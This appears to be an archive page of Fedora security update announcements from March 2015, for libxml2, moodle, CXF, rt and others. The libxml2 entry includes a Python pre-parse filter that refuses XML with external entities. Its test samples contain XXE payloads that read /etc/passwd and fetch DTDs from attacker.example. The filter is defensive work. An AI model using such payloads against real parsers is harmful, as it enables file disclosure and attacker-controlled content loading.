Resolved Bugs
1107556 – CVE-2014-0191 libxml2: external parameter entity loaded when entity substitution is disabled [fedora-all]
1090976 – CVE-2014-0191 libxml2: external parameter entity loaded when entity substitution is disabled
The fix for CVE-2014-0191 is built in; a couple of other entity-related patches were also added, including a fix for CVE-2014-3660.
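Because CVE-2014-0191 meant that turning off entity substitution in libxml2 did not stop an external parameter entity from being fetched, anyone accepting untrusted XML usually wants a check that does not depend on the parser flag at all. The following is an added example, not code from libxml2 or from the Fedora package: a pre-parse gate in Python that inspects the DOCTYPE and refuses documents declaring an external DTD subset, an external parameter entity (the shape this CVE concerns), or an external general entity. The sample documents are constructed for the example, and the scanner is deliberately simple (it tracks quoted literals and the [ ] internal subset, but not DTD comments), so it is a filter placed in front of the real parser rather than a replacement for it.

```python
import re

# Constructed sample documents (not taken from the advisory) used to exercise the gate.
PLAIN = '<?xml version="1.0"?><root><a>1</a></root>'
INTERNAL_ONLY = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE root [ <!ENTITY greeting "hello"> ]>\n'
    '<root>&greeting;</root>'
)
EXTERNAL_GENERAL = (
    '<!DOCTYPE root [ <!ENTITY leak SYSTEM "file:///etc/passwd"> ]>\n'
    '<root>&leak;</root>'
)
# The shape CVE-2014-0191 is about: a parameter entity whose replacement text is
# fetched from an external resource, referenced from the internal subset.
EXTERNAL_PARAMETER = (
    '<!DOCTYPE root [\n'
    '  <!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd">\n'
    '  %remote;\n'
    ']>\n'
    '<root/>'
)
EXTERNAL_SUBSET = '<!DOCTYPE root SYSTEM "http://attacker.example/root.dtd"><root/>'

# An ExternalID per the XML spec: SYSTEM "uri" or PUBLIC "pubid" "uri".
_LIT = r'(?:"[^"]*"|\'[^\']*\')'
_EXT_ID = rf'(?:SYSTEM\s+{_LIT}|PUBLIC\s+{_LIT}\s+{_LIT})'
_EXTERNAL_ID = re.compile(_EXT_ID)
_PARAM_ENTITY = re.compile(rf'<!ENTITY\s+%\s+\S+\s+{_EXT_ID}')
_GENERAL_ENTITY = re.compile(rf'<!ENTITY\s+(?!%)\S+\s+{_EXT_ID}')


def split_doctype(text):
    """Return (head, internal_subset) of the first DOCTYPE, or None if there is none.

    The head is everything between '<!DOCTYPE' and the '[' (or closing '>'),
    the internal subset is everything between '[' and ']'. Quoted literals are
    tracked so that '>' or brackets inside a URI do not end the scan early.
    """
    m = re.search(r'<!DOCTYPE\b', text)
    if m is None:
        return None
    head, subset = [], []
    quote = None
    in_subset = False
    i = m.end()
    while i < len(text):
        c = text[i]
        if quote:
            if c == quote:
                quote = None
        elif c in '"\'':
            quote = c
        elif c == '[' and not in_subset:
            in_subset = True
            i += 1
            continue
        elif c == ']' and in_subset:
            in_subset = False
            i += 1
            continue
        elif c == '>' and not in_subset:
            break  # end of the DOCTYPE declaration
        (subset if in_subset else head).append(c)
        i += 1
    return ''.join(head), ''.join(subset)


def reject_reason(text):
    """Return None if the document may be handed to the XML parser, else a reason.

    Anything that would make the parser reach outside the document is refused,
    regardless of whether entity substitution is enabled on the parser.
    """
    parts = split_doctype(text)
    if parts is None:
        return None  # no DOCTYPE at all: no entity declarations possible
    head, subset = parts
    if _EXTERNAL_ID.search(head):
        return "external DTD subset"
    if _PARAM_ENTITY.search(subset):
        return "external parameter entity"
    if _GENERAL_ENTITY.search(subset):
        return "external general entity"
    return None


if __name__ == "__main__":
    for name, doc in [("PLAIN", PLAIN), ("INTERNAL_ONLY", INTERNAL_ONLY),
                      ("EXTERNAL_GENERAL", EXTERNAL_GENERAL),
                      ("EXTERNAL_PARAMETER", EXTERNAL_PARAMETER),
                      ("EXTERNAL_SUBSET", EXTERNAL_SUBSET)]:
        print(f"{name:20s} -> {reject_reason(doc) or 'accept'}")
```

Documents that pass the gate can still declare internal entities, so the parser's own entity-expansion limits remain the defence against expansion attacks such as the one fixed under CVE-2014-3660 in the same update.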
Monthly Archives: March 2015
Fedora 22 Security Update: ca-certificates-2015.2.3-1.0.fc22
Resolved Bugs
1205302 – Fix the legacy CA inclusions of upstream 2.1 and 2.2
1205305 – Update to version 2.3 as released with NSS 3.18
This is an update to the set of CA certificates released with NSS version 3.18
However, the package modifies the CA list to keep several legacy CAs still trusted for compatibility reasons. Please refer to the project URL for details.
If you prefer to use the unchanged list provided by Mozilla, and accept any compatibility issues it may cause, an administrator can switch the system to it by running the “ca-legacy disable” command.
This update corrects the Fedora legacy classification of four root CA certificates, which had trust added or removed in the upstream 2.1 and 2.2 releases.
Fedora 21 Security Update: moodle-2.7.7-1.fc21
Resolved Bugs
1203203 – CVE-2015-2269 CVE-2015-2268 CVE-2015-2267 CVE-2015-2266 CVE-2015-2272 CVE-2015-2273 CVE-2015-2270 CVE-2015-2271 moodle: multiple flaws in moodle [fedora-all]
1203205 – CVE-2015-2269 CVE-2015-2268 CVE-2015-2267 CVE-2015-2266 CVE-2015-2272 CVE-2015-2273 CVE-2015-2270 CVE-2015-2271 moodle: multiple flaws in moodle [epel-6]
1190119 – CVE-2015-1493 moodle: Directory Traversal Attack possible through some files serving JS (MSA-15-0009) [fedora-all]
Update to the latest versions of the respective branches. F20 has been updated from 2.5.x to 2.6.x because 2.5.x is EOL.
Fedora 21 Security Update: tor-0.2.5.11-1.fc21
Fedora 22 Security Update: opensaml-java-xmltooling-1.3.4-9.fc22,jboss-connector-1.6-api-1.0.1-1.fc22,cxf-xjc-utils-2.6.2-1.fc22,cxf-build-utils-2.6.0-1.fc22,cxf-2.7.11-1.fc22
Resolved Bugs
1093529 – CVE-2014-0034 Apache CXF: The SecurityTokenService accepts certain invalid SAML Tokens as valid
1095534 – CVE-2014-0035 Apache CXF: UsernameTokens are sent in plaintext with a Symmetric EncryptBeforeSigning policy [fedora-all]
1095550 – CVE-2014-0110 Apache CXF: Large invalid content could cause temporary space to fill [fedora-all]
1106113 – cxf: FTBFS in rawhide
1095492 – CVE-2014-0034 Apache CXF: The SecurityTokenService accepts certain invalid SAML Tokens as valid [fedora-all]
1065245 – cxf: Upgrade to 2.7.11
1068021 – cxf: Switch to java-headless (build)requires
1095542 – CVE-2014-0109 Apache CXF: HTML content posted to SOAP endpoint could cause OOM errors [fedora-all]
1157305 – CVE-2014-3584 CVE-2014-3623 cxf: various flaws [fedora-all]
CXF upgrade to 2.7.11.
Fedora 22 Security Update: qt5-qtwebkit-5.4.1-4.fc22
Fedora 20 Security Update: mingw-qt5-qtbase-5.4.1-1.fc20,mingw-qt5-qtdeclarative-5.4.1-1.fc20,mingw-qt5-qtgraphicaleffects-5.4.1-1.fc20,mingw-qt5-qtimageformats-5.4.1-1.fc20,mingw-qt5-qtlocation-5.4.1-1.fc20,mingw-qt5-qtmultimedia-5.4.1-1.fc20,mingw-qt5-qtquick1-5.4.1-1.fc20,mingw-qt5-qtscript-5.4.1-1.fc20,mingw-qt5-qtsensors-5.4.1-1.fc20,mingw-qt5-qtsvg-5.4.1-1.fc20,mingw-qt5-qttools-5.4.1-1.fc20,mingw-qt5-qttranslations-5.4.1-1.fc20,mingw-qt5-qtwebkit-5.4.1-1.fc20,mingw-qt5-qtwinextras-5.4.1-1.fc20
Resolved Bugs
1204798 – mingw-qt5-qtwebkit: qt5-qtwebkit: QtWebKit logs visited URLs to WebpageIcons.db in private browsing mode [fedora-all]
Update to Qt 5.4.1
Fedora 22 Security Update: rt-4.2.10-2.fc22
Resolved Bugs
1200059 – CVE-2014-9472 rt: denial of service flaw in email gateway
1200065 – CVE-2015-1165 rt: information disclosure flaw in RSS feed handler
1200066 – CVE-2015-1165 rt: information disclosure flaw in RSS feed handler [fedora-21]
1200062 – CVE-2014-9472 rt: denial of service flaw in email gateway [fedora-21]
1200069 – CVE-2015-1464 rt: session hijacking flaw in RSS feed handler
1200070 – CVE-2015-1464 rt: session hijacking flaw in RSS feed handler [fedora-21]
Security fix for CVE-2014-9472
Security fix for CVE-2015-1165
Security fix for CVE-2015-1464